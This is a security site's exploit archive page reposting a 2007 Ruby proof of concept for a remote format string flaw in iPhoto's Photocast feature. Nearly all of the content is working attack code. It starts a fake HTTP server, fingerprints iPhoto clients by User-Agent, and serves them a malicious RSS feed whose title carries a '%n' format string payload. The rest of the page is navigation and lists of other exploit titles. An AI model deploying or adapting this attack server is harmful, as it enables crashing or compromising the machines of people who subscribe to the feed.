首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
iLife iPhoto Photocast (XML title) Remote Format String PoC
来源:lmh [at] info-pull.com 作者:LMH 发布时间:2007-01-05  

#!/usr/bin/ruby
#
# (c) 2006 LMH <lmh [at] info-pull.com>
# bug by Kevin Finisterre <kf_lists [at] digitalmunition.com>
# proof of concept for MOAB-04-01-2007
# see http://projects.info-pull.com/moab/MOAB-04-01-2007.rb

require 'socket'

IPHOTO_FEED = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n" +
"<rss version=\"2.0\" xmlns:aw=\"http://www.apple.com/ilife/wallpapers\">\r\n" +
"<channel>\r\n" +
"<title>" + ("A" * 256) + "%x.%n.%n.%n.%n.%n</title>\r\n" +
"<item>\r\n" +
"<title>In Gruber We Trust</title>\r\n" +
"<aw:image>http://www.digitalmunition.com/digital_munitions_detonator.jpg\r\n" +
"</aw:image>\r\n" +
"</item>\r\n" +
"</channel>\r\n" +
"</rss>\r\n"

web_port = (ARGV[0] || 80).to_i

puts "++ Starting fake HTTP server at port #{web_port}."
web_server = TCPServer.new(nil, web_port)
while (session = web_server.accept)
user_agent = session.recvfrom(2000)[0].scan(/User-Agent: (.*)/).flatten[0]
session.print "HTTP/1.1 200/OK\r\nServer: Unabomber/1.0\r\n"

# Check if remote user-agent is iPhoto.
if user_agent.scan(/iPhoto/).size < 1
puts "-- User connected (#{session.peeraddr[3]}) but not running iPhoto, sending bullshit."
session.print "Content-type: text/plain\r\n\r\n"
session.print "All your Aunt Sophia are belong to us."
else
puts "++ iPhoto #{user_agent.scan(/iPhoto\/(.+?) /)[0]} user connected (#{session.peeraddr[3]}), " +
"sending payload (#{IPHOTO_FEED.size} bytes)."
session.print "Content-type: text/xml\r\n\r\n"
session.print IPHOTO_FEED
end

session.close
end



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Acunetix WVS <= 4.0 2006071
·CA BrightStor ARCserve (tapeen
·Simple Web Content Management
·Mac OS X 10.4.8 DiskManagement
·VerliAdmin <= 0.3 (language
·Mac OS X 10.4.8 DiskManagement
·Apple Quicktime (rtsp URL Hand
·L2J Statistik Script <= 0.0
·Microsoft Vista (NtRaiseHardEr
·NaviCOPA Web Server 2.01 (GET)
·Wordpress 2.0.5 Trackback UTF-
·AllMyLinks <= 0.5.0 (index.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved